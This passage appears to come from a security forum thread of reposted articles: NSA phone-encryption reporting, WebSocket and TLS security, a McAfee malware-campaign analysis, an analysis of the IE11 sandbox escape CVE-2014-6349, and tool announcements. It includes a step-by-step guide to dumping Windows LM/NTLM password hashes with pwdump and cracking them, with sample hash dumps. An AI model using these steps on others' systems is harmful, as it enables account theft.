encryption used by cellphone companies to protect the privacy of their customers’ communications as they are transmitted across networks. These details are highly sought after by the NSA, as they can aid its efforts to crack the encryption and eavesdrop on conversations. Last year, the Washington Post reported that the NSA had already managed to break the most commonly used cellphone encryption algorithm in the world, known as A5/1. But the information collected under AURORAGOLD allows the agency to focus on circumventing newer and stronger versions of A5 cellphone encryption, such as A5/3. The documents note that the agency intercepts information from cellphone operators about “the type of A5 cipher algorithm version” they use, and monitors the development of new algorithms in order to find ways to bypass the encryption. In 2009, the British surveillance agency Government Communications Headquarters conducted a similar effort to subvert phone encryption under a project called OPULENT PUP, using powerful computers to perform a “crypt attack” to penetrate the A5/3 algorithm, secret memos reveal. By 2011, GCHQ was collaborating with the NSA on another operation, called WOLFRAMITE, to attack A5/3 encryption. (GCHQ declined to comment for this story, other than to say that it operates within legal parameters.) The extensive attempts to attack cellphone encryption have been replicated across the Five Eyes surveillance alliance. Australia’s top spy agency, for instance, infiltrated an Indonesian cellphone company and stole nearly 1.8 million encryption keys used to protect communications, the New York Times reported in February. Click to enlarge. The NSA’s documents show that it focuses on collecting details about virtually all technical standards used by cellphone operators, and the agency’s efforts to stay ahead of the technology curve occasionally yield significant results. In early 2010, for instance, its operatives had already found ways to penetrate a variant of the newest “fourth generation” smartphone-era technology for surveillance, years before it became widely adopted by millions of people in dozens of countries. The NSA says that its efforts are targeted at terrorists, weapons proliferators, and other foreign targets, not “ordinary people.” But the methods used by the agency and its partners to gain access to cellphone communications risk significant blowback. According to Mikko Hypponen, a security expert at Finland-based F-Secure, criminal hackers and foreign government adversaries could be among the inadvertent beneficiaries of any security vulnerabilities or encryption weaknesses inserted by the NSA into communication systems using data collected by the AURORAGOLD project. “If there are vulnerabilities on those systems known to the NSA that are not being patched on purpose, it’s quite likely they are being misused by completely other kinds of attackers,” said Hypponen. “When they start to introduce new vulnerabilities, it affects everybody who uses that technology; it makes all of us less secure.” “It affects everybody who uses that technology; it makes all of us less secure.” In December, a surveillance review panel convened by President Obama concluded that the NSA should not “in any way subvert, undermine, weaken, or make vulnerable generally available commercial software.” The panel also recommended that the NSA should notify companies if it discovers previously unknown security vulnerabilities in their software or systems—known as “zero days” because developers have been given zero days to fix them—except in rare cases involving “high priority intelligence collection.” In April, White House officials confirmed that Obama had ordered NSA to disclose vulnerabilities it finds, though qualified that with a loophole allowing the flaws to be secretly exploited so long as there is deemed to be “a clear national security or law enforcement” use. Vines, the NSA spokeswoman, told The Intercept that the agency was committed to ensuring an “open, interoperable, and secure global internet.” “NSA deeply values these principles and takes great care to honor them in the performance of its lawful foreign-intelligence mission,” Vines said. She declined to discuss the tactics used as part of AURORAGOLD, or comment on whether the operation remains active. ——— Documents published with this article: AURORAGOLD – Project Overview AURORAGOLD Working Group IR.21 – A Technology Warning Mechanism AURORAGOLD – Target Technology Trends Center support to WPMO NSA First-Ever Collect of High-Interest 4G Cellular Signal AURORAGOLD Working Aid WOLFRAMITE Encryption Attack OPULENT PUP Encryption Attack NSA/GCHQ/CSEC Network Tradecraft Advancement Team ——— Photo: Cell tower: Justin Sullivan/Getty Images; GSMA headquarters: Google Maps Sursa: https://firstlook.org/theintercept/2014/12/04/nsa-auroragold-hack-cellphones/
-
WebSocket Security Issues Overview In this article, we will dive into the concept of WebSocket introduced in HTML 5, security issues around the WebSocket model, and the best practices that should be adopted to address security issues around WebSocket. Before going straight to security, let’s refresh our concepts on WebSocket. Why Websocket and Not HTTP? In older times, the client server model was built with client requests the server for a resource. The Web was built for this kind of model, and HTTP was sufficient to handle these requests. However, with new advancements of technologies, needs of online gaming and real time applications have marked the need of a protocol that could provide a bidirectional connection between client and server to allow live streaming. Web applications have grown up a lot, and are now consuming more data than ever before. The biggest thing holding them back was the traditional HTTP model of client initiated transactions. To overcome this, a number of different strategies were devised to allow servers to push data to the client. One of the most popular of these strategies was long-polling. This involves keeping an HTTP connection open until the server has some data to push down to the client. The problem with all of these solutions is that they carry the overhead of HTTP. Every time you make an HTTP request, a bunch of headers and cookie data are transferred to the server. Initially HTTP was thought to be modified to create a bidirectional channel between client and server, but this model could not sustain because of the HTTP overhead and would certainly introduce latency. But in real time applications, especially gaming applications, latency cannot be afforded. Because of this shortcoming of HTTP, a new protocol known as WebSocket, which runs over the same TCP/IP model, was designed. How WebSockets Work WebSockets provide a persistent connection between client and server that both parties can use to start data at any time. The connection is initiated from client through a WebSocket handshake. This happens over a normal HTTP request packet with an “Upgrade” header. A sample connection is shown below: Later, if the server supports the WebSocket connections, then the server responds with an “Upgrade” header in the response. Sample is below: After an exchange of these request and response messages, a persistent WebSocket connection is established between a client and a server. WebSockets can transfer as much data as you like without incurring the overhead associated with traditional HTTP requests. Data is transferred through a WebSocket as messages, each of which consists of one or more frames containing the data you are sending (the payload). In order to ensure the message can be properly reconstructed when it reaches the client, each frame is prefixed with 4-12 bytes of data about the payload. Using this frame-based messaging system helps to reduce the amount of non-payload data that is transferred, leading to significant reductions in latency. Note: the “Upgrade” header tells the server that the client wants to initiate a WebSocket connection. WebSocket Security Issues WebSocket has some inherent security issues. Some of them are listed below: Open to DOS attack: WebSocket allows unlimited number of connections to the target server and thus resources on the server can be exhausted because of DOS attack. The WebSocket protocol does not give any particular way to allow a server to authenticate the clients during the handshake process. WebSocket has to take forward only the mechanism available to normal HTTP connections such as cookies, HTTP authentication or TLS authentication. It has been seen that during the upgrade handshake from HTTP to WebSocket (WS), HTTP sends all the authentication information to WS. This attack has been termed as Cross Site WebSocket Hijacking (CSWSH). WebSockets can be used over unencrypted TCP channels, which can lead to major flaws such as those listed in OWASP Top 10 A6-Sensitive Data Exposure. WebSockets are vulnerable to malicious input data attacks, therefore leading to attacks like Cross Site Scripting (XSS). The WebSocket protocol implements data masking which is present to prevent proxy cache poisoning. But it has a dark side: masking inhibits security tools from identifying patterns in the traffic. Products such as Data Loss Prevention (DLP) software and firewalls are typically not aware of WebSockets, so they can’t do data analysis on WebSocket traffic, and therefore can’t identify malware, malicious JavaScript and data leakage in WebSocket traffic. The Websocket protocol doesn’t handle authorization and/or authentication. Application-level protocols should handle that separately in case sensitive data is being transferred. It’s relatively easy to tunnel arbitrary TCP services through a WebSocket, for example, tunnel a database connection directly through to the browser. This is of high risk, as it would enable access to services to an in-browser attacker in the case of a Cross Site Scripting attack, thus allowing an escalation of a XSS attack into a complete remote breach. Recommendations around WebSockets Security flaws Below are the recommendations / best practices around the security flaws listed above: The WebSocket standard defines an Origin header field which Web browsers set to the URL that originates a WebSocket request. This can be used to differentiate between WebSocket connections from different hosts, or between those made from a browser and some other kind of network client. However, the Origin header is essentially advisory: non-browser clients can easily set the Origin header to any value, and thus “pretend” to be a browser. Origin headers are roughly analogous to the X-Requested-With header used by AJAX requests. Web browsers send a header of X-Requested-With: XMLHttpRequest which can be used to distinguish between AJAX requests made by a browser and those made directly. However, this header is easily set by non-browser clients, and thus isn’t trusted as a source of authentication. Use session-individual random tokens (like CSRF-Tokens) on the handshake request and verify them on the server. Websockets must be configured to use secure TCP channel. URI with syntax wss:// illustrates the usage of secure Websocket connection. Any data from untrusted sources must not be trusted. All input must be sanitized before it goes in the execution context. You should apply equal suspicion to data returned from the server as well. Always process messages received on the client side as data. Don’t try to assign them directly to the DOM, nor evaluate as code. If the response is JSON, always use JSON.parse() to safely parse the data. Avoid tunneling if at all possible, instead developing more secured and checked protocols on top of WebSockets. References https://devcenter.heroku.com/articles/websocket-security An Introduction to WebSockets | Treehouse Blog By Lohit Mehta|December 4th, 2014 Sursa: WebSocket Security Issues - InfoSec Institute
-
New TLS/SSL Version Ready In 2015 Kelly Jackson Higgins One of the first steps in making encryption the norm across the Net is an update to the protocol itself and a set of best-practices for using encryption in applications.The Internet's standards body next year will release the newest version of the Transport Layer Security (TLS) protocol, which, among other things, aims to reduce the chance of implementation errors that have plagued the encryption space over the past year. The more streamlined Version 1.3 of TLS (TLS is the newest generation of its better known predecessor, SSL) trims out unnecessary features and functions that ultimately could lead to buggy code. The goal is a streamlined yet strong encryption protocol that's easier to implement and less likely to leave the door open to implementation flaws. "Having options in there that are a smoking gun and one developer gets wrong… could lead to a huge security problem," Russ Housley, chair of the Internet Architecture Board (IAB), says of the problem that TLS 1.3 aims to solve. That's the kind of scenario that led to the Heartbleed bug in the OpenSSL implementation of the encryption protocol. Heartbleed came out of an error in OpenSSL's deployment of the "heartbeat" extension in TLS. The bug, if exploited, could allow an attacker to leak the contents of the memory from the server to the client and vice versa. That could leave passwords and even the SSL server's private key potentially exposed in an attack. [The era of encrypted communications may have finally arrived. Internet Architecture Board chairman Russ Housley explains what the IAB's game-changing statement about encryption means for the future of the Net: Q&A: Internet Encryption As The New Normal.] Aside from the updated TLS protocol, the Internet Engineering Task Force (IETF), which crafts the protocols, also is looking at how to better deploy encryption in applications. The IETF's Using TLS in Applications (UTA) working group will offer best-practices for using TLS in applications, as well as guidance on how certain applications should use the encryption protocol, which also will promote interoperability among encrypted systems. Pete Resnick, the IETF's applications area director, says among the best-practices are the use of the latest crypto algorithms and avoiding the use of weak (or no) encryption, as well as eliminating the use of older TLS/SSL versions. "This will end up making things more secure in the long run by providing common guidelines across implementations," he says. UTA also is working on guidance for using TLS with the instant messaging protocol XMPP (a.k.a. Jabber) and also using TLS with email client protocols POP, IMAP, and SMTP Submission. The goal is to make encryption more interoperable among messaging servers to help propel the use of encrypted communications, according to Resnick. Kelly Jackson Higgins is Executive Editor at DarkReading.com... Sursa: New TLS/SSL Version Ready In 2015
-
[TABLE=align: left] [TR] [TD][TABLE=width: 100%] [TR] [TD]Windows Password Kracker is a free software to recover the lost or forgotten Windows password. It can quickly recover the original windows password from either LM (LAN Manager) or NTLM (NT LAN Manager) Hash.[/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Windows encrypts the login password using LM or NTLM hash algorithm. Since these are one way hash algorithms we cannot directly decrypt the hash to get back the original password. In such cases 'Windows Password Kracker' can help in recovering the windows password using the simple dictionary crack method. Before that you need to dump the password hashes from live or remote windows system using pwdump tool (more details below). Then feed the hash (LM/NTLM) for the corresponding user into 'Windows Password Kracker' to recover the password for that user. In forensic scenarios, investigator can dump the hashes from the live/offline system and then crack it using 'Windows Password Kracker' to recover the original password. This is very crucial as such a password can then be used to decrypt stored credentials as well as encrypted volumes on that system. 'Windows Password Kracker' uses simple & quicker Dictionary based password recovery technique. By default it comes with sample password file. However you can find good collection of password dictionaries (also called wordlist) here & here. Though it supports only Dictionary Crack method, you can easily use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'Windows Password Kracker'. It works on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader] Features[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Free tool to quickly recover the Windows login password. Supports Windows password recovery from both LM & NTLM Hash. Uses simple dictionary crack method. Displays detailed statistics during Cracking operation Stop the password cracking operation any time. Very easy to use with cool GUI interface. Generate Windows Password Recovery report in HTML/XML/TEXT format. Includes Installer for local Installation & Uninstallation. [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader]Installation & Un-installation[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Windows Password Kracker comes with Installer to help in local installation & un-installation. This installer has intuitive wizard which guides you through series of steps in completion of installation.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]At any point of time, you can uninstall the product using the Uninstaller located at following location (by default)[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_code][Windows 32 bit] C:\Program Files\SecurityXploded\WindowsPasswordKracker [Windows 64 bit] C:\Program Files (x86)\SecurityXploded\WindowsPasswordKracker[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader] How to Dump LM/NTLM Hash & Crack it?[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] 'Windows Password Kracker' is very easy to use tool for any generation of users. Here are simple steps[/TD] [/TR] [TR] [TD] Install 'Windows Password Kracker' on any system (preferably faster high end systems). Use pwdump tool ( ) to recover the password hashes from live or offline windows system. Sample output will be as shown below [/TD] [/TR] [TR] [TD=class: page_code] Administrator:500:D702A1D01B6BC2418112333D93DFBB4C:C8DBB1CFF1970C9E3EC44EBE2BA7CCBC::: ASPNET:1001:359E64F7361B678C283B72844ABF5707:49B784EF1E7AE06953E7A4D37A3E9529::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: Test:1002:D702A1D01B6BC2418112333D93DFBB4C:C8DBB1CFF1970C9E3EC44EBE2BA7CCBC:::[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Each dumped user account is in following format[/TD] [/TR] [TR] [TD=class: page_code] Username : User ID : LM hash : NTLM Hash :::[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]On newer operating systems (such as vista, win7 etc) LM hash will be absent as it is disabled by default.[/TD] [/TR] [TR] [TD] Once you get the password hash, you can copy either LM (preferred) or NTLM hash onto 'Windows Password Kracker'. Then select the type of hash as LM or NTLM from the drop down box. Next select the password dictionary file by clicking on Browse button or simply drag & drop it. You can find a sample dictionary file in the installed location. Finally click on 'Start Crack' to start the Windows Password recovery. During the operation, you will see all statistics being displayed on the screen. Message box will be displayed on success. At the end, you can generate detailed report in HTML/XML/Text format by clicking on 'Report' button and then select the type of file from the drop down box of 'Save File Dialog'. [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader]Screenshots[/TD] [/TR] [TR] [TD=align: center][/TD] [/TR] [TR] [TD]Screenshot 1: Windows Password Kracker is showing the recovered Password from NTLM hash.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Screenshot 2: Detailed Windows Password Recovery report generated by Windows Password Kracker[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader] Test Results[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] WindowsPasswordKracker is successfully tested on Windows XP to latest operating system, Windows 8. It can recover the hash password successfully for LM /NTLM hash value.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader] Disclaimer[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] 'Windows Password Kracker' is designed with good intention to recover the Lost Windows Password. Like any other tool its use either good or bad, depends upon the user who uses it. However neither author nor SecurityXploded is in anyway responsible for damages or impact caused due to misuse of WindowsPasswordKracker. Read our complete 'License & Disclaimer' policy here.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader] Release History[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 90%, align: center] [TR] [TD=class: page_sub_subheader]Version 2.6: 3rd Dec 2014[/TD] [/TR] [TR] [TD]Removed false positive with various Antivirus solutions[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_sub_subheader]Version 2.5: 31st Mar 2014[/TD] [/TR] [TR] [TD]Improved GUI interface with magnifying icon effects and about dialog changes.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_sub_subheader]Version 2.0: 21st Feb 2013[/TD] [/TR] [TR] [TD]Quick help link on dumping LM/NTLM hash from system and cracking it. Fix for screen refresh problem and few UI improvements.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_sub_subheader]Version 1.5: 28th Oct 2012[/TD] [/TR] [TR] [TD]Added support to automatically remember and restore user settings.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_sub_subheader]Version 1.0: 3rd Aug 2012[/TD] [/TR] [TR] [TD]First public release of Windows Password Kracker.[/TD] [/TR] [TR] [TD][/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader] Download[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 95%, align: center] [TR] [TD] FREE Download Windows Password Kracker v2.6 License : Freeware Platform : Windows XP, 2003, Vista, Windows 7, Windows 8 Download [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD]Sursa: Windows Password Kracker : Free Windows Password Recovery Software.[/TD] [/TR] [/TABLE]
-
[h=2].: XNTSV:. [/h] XNTSV is a utility that displays detailed information about Windows system structurs. Download XNTSV(32 bit) ver. 1.8 (OS Windows) Download XNTSV(64 bit) ver. 1.8 (OS Windows) XNTSV is absolute free for commercial and non-commercial use. Sursa: .:NTInfo:.
-
[h=2].: PDBRipper:. [/h] PDBRipper is a utility for extract a information from PDB-files. PDPRipper can extract: Enumerations User define types(structures, unions ...) Type defines Download PDBRipper ver. 1.12 (OS Windows) PDBRipper is absolute free for commercial and non-commercial use. Sursa: .:NTInfo:.
-
.: Detect It Easy:. Detect It Easy is a packer identifier Download DIE ver. 0.93 (Mac OS X) Download DIE ver. 0.93 (Windows) Download DIE ver. 0.93 (Linux Ubuntu 32-bit(x86)) Download DIE ver. 0.93 (Linux Ubuntu 64-bit(x64)) For other Linux you can try to compile DIE from the sources. Download DIE DLL (Windows) Download DieSort (Windows) Plugin for HIEW (author exet0l) more info Plugin for CFF Explorer(32 bits only!)(author exet0l) more info GITHUB signatures GITHUB engine Executable Image Viewer (This program uses DIE DLL) more info(EN,PL) Detect It Easy is absolute free for commercial and non-commercial use. Sursa: .:NTInfo:.
-
Behavior Analysis Stops Romanian Data-Stealing Campaign By Ankit Anubhav , Christiaan Beek on Dec 03, 2014 In a recent press announcement, McAfee and Europol’s European Cyber Centre announced a cooperation of our talents to fight cybercrime. In general these joint operations are related to large malware families. Writing or spreading malware, even in small campaigns, is a crime. McAfee Labs doesn’t hesitate to reach out to its partners and contacts in CERTs and law enforcement. In the following case, a new Romanian-based data-stealing campaign was caught early due to behavioral and data analytics. In our sample behavioral database, we found a new site hxxp://virus-generator.hi2.ro. Visiting the link revealed an open directory that allowed us to browse the content: Often we observe that malware authors become overzealous in attacking victims, and forget to protect their own malware servers. Despite this campaign’s effectiveness, the malware authors took very little care to ensure that they themselves were not breached. The binaries, which help us to understand how this campaign works, are injector.exe and blurmotion.exe. As the name suggests, injector.exe compromise the victim’s system via code injection in Internet Explorer. It first disables the firewall to ensure a smooth connection to the malware control server. With the help of the mget command, the malware connects control site and downloads the payload blurmotion.exe. The fact that the malware site doesn’t use any authentication makes sense because it leads to a swift connection between the victim and the attacker. Once the payload is downloaded, the batch file root.vbs takes over. This batch file is dropped by injector.exe and ensures that blurmotion.exe is executed. We see the use of wscript.sleep 30000, which makes sure no activity happens for 5 minutes. This could be an attempt to deceive malware analyzers that the sample won’t do anything. Necessary run entries make sure root.vbs runs. After that a misspelled “restartt” is forced. After this step, the system goes into a forced restart, and by this time the work of injector.exe (to download and install the payload) is done. From here the payload takes over. Blurmotion.exe, like its parent, drops a batch file to perform malicious activities. Blurmotion takes the username of the victim and dumps all the processes running in the victim’s system with the name %usename%.ini. Once the stolen data is logged, the malware uploads it to the control server via the mput command. We can see “echo cd BM” used in commands. This is the same BM folder on the malware control server that stores the logs of all victims. Like the payload, this stolen data is exposed to anyone who finds the malware control server. Our test virtual machine “victim” was named Klone, and we found it quickly uploaded on the control server. The size of Klone.ini is zero because we had reverted to the virtual machine before the malware could steal data. In all the other infected user logs, we can see the malware executable blurmotion.exe running, confirming that those systems had been compromised. We can also see repeated connections made to a specific site (mygarage.ro), possibly an attempt to increase its traffic. The author is so aggressive that he or she even tried to overclock the CPU to bring more traffic to this site. The author succeeded in these attempts. In our internal behavioral database we found a lot of redirects to this site. McAfee detects these payloads as Rodast. McAfee SiteAdvisor also warns against connecting to this site: Because the campaign was based in Romania, McAfee Labs contacted the Romanian CERT. After we discussed the approach and strategy with them, the Romanian team took the appropriate actions, and gave us permission to publish our analysis of the campaign in this article. Malware authors sometimes act carelessly, and assume that they are safe if no one detects them. But data from behavioral analysis, along with cooperation with CERTs and law enforcement, can find live campaigns and stop them. Sursa: Behavior Analysis Stops Romanian Data-Stealing Campaign | McAfee
-
[h=2]Facebook Partners With ESET to Fight Malware[/h]By Brian Prince on December 03, 2014 Facebook is teaming with security vendor ESET to improve defenses against malware. The move follows a partnership Facebook announced in May involving F-Secure and Trend Micro. "[F-Secure and Trend Micro] built free versions of their products directly into Facebook so that people could get the help they need without additional hassle," blogged Chetan Gowda, a software engineer on the Site Integrity team at Facebook. "Today, we are expanding those capabilities by adding the anti-malware technology of another IT security vendor, ESET," he wrote. "A larger number of providers increases the chances that malware will get caught and cleaned up, which will help people on Facebook keep their information more secure." According to Facebook, if the device a user is using to access its services is behaving suspiciously and shows signs of a possible malware infection, a message will appear offering the user an anti-malware scan for their device. The user can run the scan, see the results and disable the software without logging out of Facebook. "Glancing through headlines in recent months reveals that malware continues to be a persistent problem for governments, companies, and individuals," Gowda noted. "With the potential to remain undetected on devices for months, malicious code can collect personal information and even spread to other computers in some cases. Compounding the challenges for defense, most people lack basic anti-malware programs that could protect their devices or clean up infections more quickly. "We've worked with ESET to incorporate their finely tuned security software directly into our existing abuse detection and prevention systems, similarly to what we did earlier this year with the other providers," Gowda continued. "Together, these three systems will help us block malicious links and harmful sites from populating the News Feeds and Messages of the 1.35 billion people who use Facebook." Sursa: Facebook Partners With ESET to Fight Malware | SecurityWeek.Com
-
HackRF Blue: A Lower Cost HackRF Earlier in the year the HackRF One was released by Micheal Ossmann. It is a transmit and receive capable software defined radio with a 10 MHz to 6 GHz range which currently sells for around $300 USD. Since the HackRF is open source hardware, anyone can make changes to the design and build and sell their own version. The HackRF Blue is a HackRF clone that aims to sell at a lower cost. By sourcing lower cost parts that still work well in the HackRF circuit, the team behind the HackRF Blue were able to reduce the price of the HackRF down to $200 USD. They claim that the HackRF Blue has the same performance as the HackRF One and is fully compatible with the HackRF software. They are currently seeking funding through an IndieGoGo campaign. Their main goal through the funding is to help provide underprivileged hackerspaces with a free HackRF. The HackRF Blue https://www.youtube.com/watch?feature=player_embedded&v=giSax3XBbJ4 Sursa: HackRF Blue: A Lower Cost HackRF - rtl-sdr.com
-
Escaping the Internet Explorer Sandbox: Analyzing CVE-2014-6349 8:00 pm (UTC-7) | by Jack Tang (Threats Analyst) Applications that have been frequently targeted by exploits frequently add sandboxes to their features in order to harden their defenses against these attacks. To carry out a successful exploit, an attacker will have to breach these sandboxes to run malicious code. As a result, researchers will pay particular attention to exploits that are able to escape sandboxes. In both October and November Patch Tuesday cycles, Microsoft addressed several vulnerabilities that were used by attackers to escape the Internet Explorer sandbox. One of these was CVE-2014-6349, which was addressed by Microsoft as part of MS14-065, November’s cumulative Internet Explorer patch. We chose this particular vulnerability for two reasons: exploiting it is relatively easy, and its methodology – using shared memory to escape the Internet Explorer sandbox – has not been seen before. A separate vulnerability that also allowed for sandbox escapes – CVE-2014-6350 – was also fixed in the same patch, and Google released details about this second vulnerability earlier this week. Internet Explorer 11 exposes a shared memory section object to all tab process (which are sandboxed). This is used to store various Internet Explorer settings. Normally, the tab processes only read this to see these settings. However, in Enhanced Protected Mode (EPM, which is IE’s sandbox mode), the shared memory section‘s DACL (Discretionary Access Control List) is not configured correctly. The tab processes have “write” permission to modify the shared memory section content. This can be used by an attacker to break the IE sandbox. How can this be done? We will explain this in the rest of this post. To understand the concepts covered in this post, background knowledge about Protected Mode (PM) and EPM is necessary. These MSDN documents and HITB presentations provide background information on these topics. I carried out my tests on a system running Windows 8.1 with Internet Explorer 11.0.9600.17107. After enable IE 11’s EPM mode, we run IE. The broker process and tab process are seen below: Figure 1. Internet Explorer broker and tab processes The parent iexplore.exe broker process’s integrity is Medium. The iexplore.exe tab process’s integrity is AppContainer. This means the web page rendering in the sandboxed tab process is in the sandbox and its privilege is controlled. Both process share a memory section: \Sessions\1\BaseNamedObjects\ie_ias_<frame process id>-0000-0000-0000-000000000000. The section object’s DACL (Discretionary Access Control List) status is below: Figure 2. Access Control List for shared memory The ACE (Access Control Entry) for SID S-1-15-3-4096 is encircled. This shows that this particular “user” can modify the shared memory. What is S-1-15-3-4096? It is a “capability” whose name is “internetExplorer”. This particular concept was introduced in Windows 8 with AppContainer (please refer to the HITB presentation). Now, let us check the sandboxed tab process’s security tokens: Figure 3. List of sandboxed tab process security tokens The above shows us that the sandbox tabs can modify the memory of the shared memory section. Because of the shared memory section’s role, the sandbox can be escaped. Before we look into why, we can examine the previous protections that were used by Internet Explorer. Figure 4. Architecture of Internet Explorer Internet Explorer 8 introduced the Loosely-coupled Internet Explorer (LCIE) architecture to improve the browser’s reliability. In IE11 EPM mode, the broker process is running with middle integrity and the tab processes are running in AppContainer (i.e., each is sandboxed). The broker process manages the children tab processes, with each invidual tab process rendering various oben web pages. In Figure 4, CBrowserFrame within the broker process receives and dispatches messages to process the procedure CBrowserFrame:: FrameMessagePump(). CTabWindow represents tab windows, which each CTabWindow instance corresponding to a sandboxed tab process. The CTabWindowManger manages existing CTabWindow instances, for example, creating a new instance or finding an existing instance. The shared memory contains the immutable application state (IAS), which is queried by the parent broker process and the sandboxed processes. The shared memory’s address was hold by a global variable whose full name is g_pvImmutableApplicationStateMappingBaseAddress. For convenience , we can call this shared memory as shared IAS memory. This memory is created when the broker process starts. Below is the call stack: Figure 5. Call stack After CreateFileMapping is called, the access control information for this section object will be set. Figure 6. Setting the access control information The vulnerability exists in the circled code. The SetWindowsHandleAccess function’s parameter is not set correctly, which leads to the shared memory section object’s ACE for the internetExplorer capability to have the modify permission. Why can the attacker escape from the IE sandbox by modified shared IAS memory? Let us examine the contents of this memory space. It is 0x25C in size, and the table below lists its contents. Table 1. Contents of shared memory space We can guess that if an attacker can modify the relevant byte(s) from a sandboxed process, it will control parent broker process’s behavior. For example, let us try the offset 0x2C. Its value is normally 1. We set it to zero from a sandboxed tab process. Normally, when a new tab is created, this is what is seen. A new process is created for the new tab. Figure 7. Normal setup – separate processes per tab If the boolean value at 0x2C is set to zero, a process for a new tab window is not created, as seen below: Figure 8. No separate processes per tab Two tabs only have one process. Checking the new tab’s properties, we find: Figure 9. Protected Mode turned off The page is not in sandbox mode (EPM mode). We know that 0x2C is a flag that determines whether a new process is created for a new tab, but how does this lead to a sandbox escape? When the user clicks the “New Tab” button in the IE UI, the broker process’s CBrowserFrame:: FrameMessagePump() function will get the message, and will dispatch the corresponding window’s procedure to handle the message. Finally, it will call CTabWindowManager to create a CTabWindow instance, and will then query the shared IAS memory at 0x2c to decide whether to create new process for the tab window or create a new thread instead. If this value is 1, a new process is created. If it is 0, the broker process only creates a new thread for the new tab. However, in this case, the new tab renders in the parent broker process’s instance. We can see that the behavior of the parent broker process was modified by the sandboxed process – hence, the sandbox has been breached using this method. Any breach of a sandbox is dangerous and may be exploited in more dangerous attacks. This vulnerability was fixed by Microsoft by correcting the ACE of the internetExplorer capability for the shared IAS memory. Figure 10. Corrected ACE This can be seen in the code below. Figure 11. Modified code Sursa: Escaping the Internet Explorer Sandbox - Analyzing CVE-2014-6349 | Security Intelligence Blog | Trend Micro
-
Toorcon 16 - Reverse Engineering Malware For Newbies Description: http://gironsec.com/code/Re_For_Nubs.tgz For More Information please visit: - ToorCon | Information Security Conferences Via: Toorcon 16 - Reverse Engineering Malware For Newbies
-
Duktape Duktape is an embeddable Javascript engine, with a focus on portability and compact footprint. Duktape is easy to integrate into a C/C++ project: add duktape.c and duktape.h to your build, and use the Duktape API to call Ecmascript functions from C code and vice versa. Main features: Embeddable, portable, compact; about 210kB code, 80kB memory, 40kLoC source (excluding comments etc) Ecmascript E5/E5.1 compliant, some features borrowed from E6 draft Built-in regular expression engine Built-in Unicode support Minimal platform dependencies Combined reference counting and mark-and-sweep garbage collection with finalization Custom features like coroutines, built-in logging framework, and built-in CommonJS-based module loading framework Property virtualization using a subset of Ecmascript E6 Proxy object Liberal license (MIT) Current status: Stable Support: User community Q&A: Stack Overflow duktape tag Bugs and feature requests: GitHub issues General discussion: IRC #duktape on chat.freenode.net (webchat) Sursa: Duktape
-
Bre, nu va mai faceti publice adresele de mail...
-
[h=1]american fuzzy lop (0.85b)[/h] American fuzzy lop is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary. This substantially improves the functional coverage for the fuzzed code. The compact synthesized corpora produced by the tool are also useful for seeding other, more labor- or resource-intensive testing regimes down the road. Compared to other instrumented fuzzers, afl-fuzz is designed to be practical: it has modest performance overhead, uses a variety of highly effective fuzzing strategies, requires essentially no configuration, and seamlessly handles complex, real-world use cases - say, common image parsing or file compression libraries. [h=2]The "sales pitch"[/h] In a hurry? There are several fairly decent reasons to give afl-fuzz a try: It is pretty sophisticated. It's an instrumentation-guided genetic fuzzer capable of synthesizing complex file semantics in a wide range of non-trivial targets, lessening the need for purpose-built, syntax-aware tools. It also comes with a unique crash explorer to make it dead simple to evaluate the impact of crashing bugs. It has street smarts. It is built around a range of carefully researched, high-gain test case preprocessing and fuzzing strategies rarely employed with comparable rigor in other fuzzing frameworks. As a result, it finds real bugs. It is fast. Thanks to its low-level compile-time instrumentation and other optimizations, the tool offers near-native fuzzing speeds against common real-world targets. For example, you can get 2,500+ execs per second per core with libpng. It's rock solid. Compared to other instrumentation- or solver-based 